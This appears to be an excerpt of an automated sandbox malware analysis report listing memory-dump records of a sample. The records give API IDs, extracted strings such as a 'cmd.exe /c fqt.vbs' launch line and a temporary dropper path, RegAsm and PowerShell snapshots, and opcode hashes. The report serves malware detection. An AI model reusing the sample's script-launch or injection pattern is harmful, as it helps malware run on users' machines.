                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                      • String ID: cmd.exe /c fqt.vbs
                                                                      • API String ID: 2312377310-3590164600
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1065093856-305352358
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                      • String ID:
                                                                      • API String ID: 140117192-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                      • String ID:
                                                                      • API String ID: 140117192-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
• Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2396496026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q
                                                                      • API String ID: 0-388095546
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-3886637785
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-2449488485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-3823777903
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q$`Q^q$`Q^q
                                                                      • API String ID: 0-846367443
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $lPj
                                                                      • API String ID: 0-1476722723
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 7e3936e67bbb973428e2e8b6e5938ac9417d26e43075048a3a2d1030d5454beb
                                                                      • Instruction ID: 2d955af98a6f55767e2ffd9ebd881281842283e17467011dcd193b67206ac4c4
                                                                      • Opcode Fuzzy Hash: 7e3936e67bbb973428e2e8b6e5938ac9417d26e43075048a3a2d1030d5454beb
                                                                      • Instruction Fuzzy Hash: 8B318D31B102098BDB09BB79A4A457E7BE7EFC8210B104539D60BCB384EE35DD1687D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 4a2488533f5421dc96e03f798bae17cdbb053e1608f0d593dc04c29f9724d9d3
                                                                      • Instruction ID: 50a73f494c94b7eaf3057bf666db5f2147334146f5ec74615005a14aa78f9de9
                                                                      • Opcode Fuzzy Hash: 4a2488533f5421dc96e03f798bae17cdbb053e1608f0d593dc04c29f9724d9d3
                                                                      • Instruction Fuzzy Hash: 8D21AD317102098BDB09BB78A4A867E3AE3ABC9211710497DD60BDB385EE35DD0687D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq
                                                                      • API String ID: 0-1245868
                                                                      • Opcode ID: ae1068e8cf02b2371315a7dda49a5c01a59dc396a595681f96f915a055e54f3e
                                                                      • Instruction ID: 245e7e4929997f133bf69e1dd1bb5318e9fb1212ec2ed9a157cafbd73ca5e8ae
                                                                      • Opcode Fuzzy Hash: ae1068e8cf02b2371315a7dda49a5c01a59dc396a595681f96f915a055e54f3e
                                                                      • Instruction Fuzzy Hash: B721AF347046108FCA14AB38D468A2E77EBBFC5B94B1545AFE602CB7A1CF64DC06CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 8e134d866cf530d75b73f1072c0a3e602ccb3ff1aa8ddf889abf13f98d84704a
                                                                      • Instruction ID: 22ebfce65c5378a4bec25c0f652f213ae5bca04d953050cfaea846710505e765
                                                                      • Opcode Fuzzy Hash: 8e134d866cf530d75b73f1072c0a3e602ccb3ff1aa8ddf889abf13f98d84704a
                                                                      • Instruction Fuzzy Hash: 30F090323406054FC218FB29E554A6EBBE7EBC92503509969D05A8B358EF20FC4A87A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q
                                                                      • API String ID: 0-1948671464
                                                                      • Opcode ID: eec1df3e922a1d308dc459a9ac834778a10acc8ec87712344be8941a91cc3242
                                                                      • Instruction ID: 54aeae80ac4f49e2d5da0520b461c3b463d17e79400009d60cc0d67600290647
                                                                      • Opcode Fuzzy Hash: eec1df3e922a1d308dc459a9ac834778a10acc8ec87712344be8941a91cc3242
                                                                      • Instruction Fuzzy Hash: 6CE06D3374011427D218555EEC59F6BA6DAEBC9A25F69006AF109EB6A0CC92EC0542A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 49e97840bff99fb02a55640d963b00e5ef0edfb692c6482d64ba2b32a3017a2a
                                                                      • Instruction ID: 96fa92e70712868488366325eb31373e0321787ff9273b0bd4d5a1fa21c79def
                                                                      • Opcode Fuzzy Hash: 49e97840bff99fb02a55640d963b00e5ef0edfb692c6482d64ba2b32a3017a2a
                                                                      • Instruction Fuzzy Hash: BA01AD74A01209EFCB04FFB8EA9869CBFF2FB44244F1444A9E40AA7325DB305E46CB11
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 767d2565ff8e7c56922ce17f446ed414f82106762e07da80cad5f90f14036ef9
                                                                      • Instruction ID: 1cd0503f9f8cfc02a5ebc31df18a8e19979170762cf3542f8cdeafa2c1e55467
                                                                      • Opcode Fuzzy Hash: 767d2565ff8e7c56922ce17f446ed414f82106762e07da80cad5f90f14036ef9
                                                                      • Instruction Fuzzy Hash: 43F03770A0120DEFCB44FFB8EA9859CFBB2FB84244B1045A9E80A97754EB305E498B51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `Q^q
                                                                      • API String ID: 0-1948671464
                                                                      • Opcode ID: 7cf7cee0cda880fc158226e8a1b7dad0e013f9e96ffd167d3df072386cb4ed4e
                                                                      • Instruction ID: 1fbf7829f0b6ffdb94704d5398a9809cb36fd724631d63fa0fd984645e9969e2
                                                                      • Opcode Fuzzy Hash: 7cf7cee0cda880fc158226e8a1b7dad0e013f9e96ffd167d3df072386cb4ed4e
                                                                      • Instruction Fuzzy Hash: 9EE086327401146BD318556FEC54F67B6DEEBC9A24F54007AF209DB3A0CC91EC0542A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bc1d67f6707008aa79de3c3a1ca4174e3e0b81d3ea06dc1dd520d7a634fcd8e
                                                                      • Instruction ID: 9d66fc9dc202c359dcf1cda8b7826b2ddf4c4dbe81b9f88ab999bbebdb560054
                                                                      • Opcode Fuzzy Hash: 3bc1d67f6707008aa79de3c3a1ca4174e3e0b81d3ea06dc1dd520d7a634fcd8e
                                                                      • Instruction Fuzzy Hash: 3F426B307406199FCB64AF68D450A2EBBF2FBC6305B11495CD5039B3A5CFB9ED098B86
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65efbdb442865b22c9cd97c89277fe98f3f6b6c1a77d7e0752cd9b9eff24db39
                                                                      • Instruction ID: 40861ffb360421c97551f5bc918d63cec74308940882ef1535ec16a86bc6caef
                                                                      • Opcode Fuzzy Hash: 65efbdb442865b22c9cd97c89277fe98f3f6b6c1a77d7e0752cd9b9eff24db39
                                                                      • Instruction Fuzzy Hash: C7425C307406199FCB64AF68D450A2EB7F2FB86309B11495CD5039F3A5CFB9ED098B86
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fa1f6a60e108072edbebf7cc823760cd50451c69592c42a958422d378e4b83f
                                                                      • Instruction ID: 17708c361107c990e190afea40f180d4f89512fdf2cdee370f0328a6fa0e9474
                                                                      • Opcode Fuzzy Hash: 8fa1f6a60e108072edbebf7cc823760cd50451c69592c42a958422d378e4b83f
                                                                      • Instruction Fuzzy Hash: 44323735B006058FDB54DF29C588A6EBBF2FF88304B1584A9E906DB366DB74EC45CB90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 32d99317f99d54b0dc9cbe47fcf1a0637bdb2454a343bc99f0b8cf5aa9e50fec
                                                                      • Instruction ID: 7bef8e48a489f8e90ee3daac242c5a9970de3cf0f01047a493b2c1b810f62a35
                                                                      • Opcode Fuzzy Hash: 32d99317f99d54b0dc9cbe47fcf1a0637bdb2454a343bc99f0b8cf5aa9e50fec
                                                                      • Instruction Fuzzy Hash: AB322670B402189FCB54DF68C894EAABBF6FF89704F108099E506DB3A6DA71ED41CB50
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a359be05d803d2502ffee125f25209800f0c4b09630d18f61786b569f40f6c44
                                                                      • Instruction ID: ad5fba55a4f33a6a869553f12cb1c3a0eb95ba1b8d115b9f6b6bf7bfbb6170c6
                                                                      • Opcode Fuzzy Hash: a359be05d803d2502ffee125f25209800f0c4b09630d18f61786b569f40f6c44
                                                                      • Instruction Fuzzy Hash: 77229574B401188FCB54AB24C955EAE77B2FFC9704F108099EA069B3A6CF71ED81DB91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f643769ed6e6f1c3a14d6b32ced2c827cc304c6747f881fdeddda70c0b614e7
                                                                      • Instruction ID: 7ebb1d21014091c10eedec02e7046652359f98f715e926c2a27b1e4ec0cccb63
                                                                      • Opcode Fuzzy Hash: 5f643769ed6e6f1c3a14d6b32ced2c827cc304c6747f881fdeddda70c0b614e7
                                                                      • Instruction Fuzzy Hash: 9C02A030B402189FDB64AB64C854A2E77F2FF8A704F118459D5029F3A1CFB9EC49CB91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 38e06b9f31381dda585c783004f2720da8f9b32335cfb67536f0d33676bc55a6
                                                                      • Instruction ID: fc3e587ef310258bea47f41ea049fec32de02da4f71a8778e44aa7202633b613
                                                                      • Opcode Fuzzy Hash: 38e06b9f31381dda585c783004f2720da8f9b32335cfb67536f0d33676bc55a6
                                                                      • Instruction Fuzzy Hash: B6F15E75B401059FCB54EF68C894E9EBBF6FF89704B1580AAE506DB362CA31EC05CB61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daede141ce218bc586de72893fc472937c8210ecba779489837c7f04cb60aff7
                                                                      • Instruction ID: 6642baae1053a67d1b9e002102887e6d37d3bd6e53fd0b8db9ffc69ae90a576c
                                                                      • Opcode Fuzzy Hash: daede141ce218bc586de72893fc472937c8210ecba779489837c7f04cb60aff7
                                                                      • Instruction Fuzzy Hash: F0E1A234B402189FDB54AB64C855B2E77B6FF8A704F118459E602CB3A1CFB9EC49CB91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 350e33825edbdd3e822ca7a7ca2e6e4f08ea423de8817e5c31c9eef310ea4993
                                                                      • Instruction ID: 06235cef5dfa239f6e9fca857882c68957cdc44ae7a7d16c9474b8ba624b5e8f
                                                                      • Opcode Fuzzy Hash: 350e33825edbdd3e822ca7a7ca2e6e4f08ea423de8817e5c31c9eef310ea4993
                                                                      • Instruction Fuzzy Hash: 8AD18234B102089FDB54AB64C959B6E7BB6FF8A704F118056E602CB3A1CFB9DC45CB91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9e3f357d93189bcab72e923216d96564b6e8854fa8a85f361f6d586bdff2844
                                                                      • Instruction ID: e14d77aba0b182c382a5a494d73fdc9ddef425be6fa4eb732b991c5f07403b1f
                                                                      • Opcode Fuzzy Hash: f9e3f357d93189bcab72e923216d96564b6e8854fa8a85f361f6d586bdff2844
                                                                      • Instruction Fuzzy Hash: 90E12C75A00219CFDB15DF64C884B9DB7B2FF85348F1144AAEA09BB261CB71AD86CF50
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae7ef8c10238062e136eb20a11286a752bdb0c130cc2a4860d967ce2251d8ef6
                                                                      • Instruction ID: 680b76634476ce75b2dbac2bbf792d3a0101eda04fff5453090ce939ce4f1beb
                                                                      • Opcode Fuzzy Hash: ae7ef8c10238062e136eb20a11286a752bdb0c130cc2a4860d967ce2251d8ef6
                                                                      • Instruction Fuzzy Hash: CEB13534B006048FDB44DF39D598A6EBBF2BF89204B1580A8E946DB376DB74EC05CB51
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118276716.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_6880000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 126fa082b6bfbf224fcc9a0ac0ce9ddeb05453ae3ab4f7b22940240f4c7af8d4
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0bf1f51aa63e3dd36299554e79e4c17757108b4381d00f1ff3a5c7137c1b9c4
                                                                      • Instruction ID: 6aeb3d723401cf3c31ffe4d358160d8256190eb44add9d282e14cd0ee01e39c2
                                                                      • Opcode Fuzzy Hash: d0bf1f51aa63e3dd36299554e79e4c17757108b4381d00f1ff3a5c7137c1b9c4
                                                                      • Instruction Fuzzy Hash: 76313371E402098BC701DF7DD5A46AABBF6BF88344B19821AD101A7399DF30DC40CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4ebf445852c0fc962537600d500ca6d78e3b0f542f314b18d7df3f03cf6d814
                                                                      • Instruction ID: af6d256b602e5ceb626a67d3b38fa97ef3f82e29363f79d3e35512efebb070a8
                                                                      • Opcode Fuzzy Hash: b4ebf445852c0fc962537600d500ca6d78e3b0f542f314b18d7df3f03cf6d814
                                                                      • Instruction Fuzzy Hash: BF31C171A042554FD705DF2CD8903C5F7E2EF86394B4886BAD909DF386DA749845CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
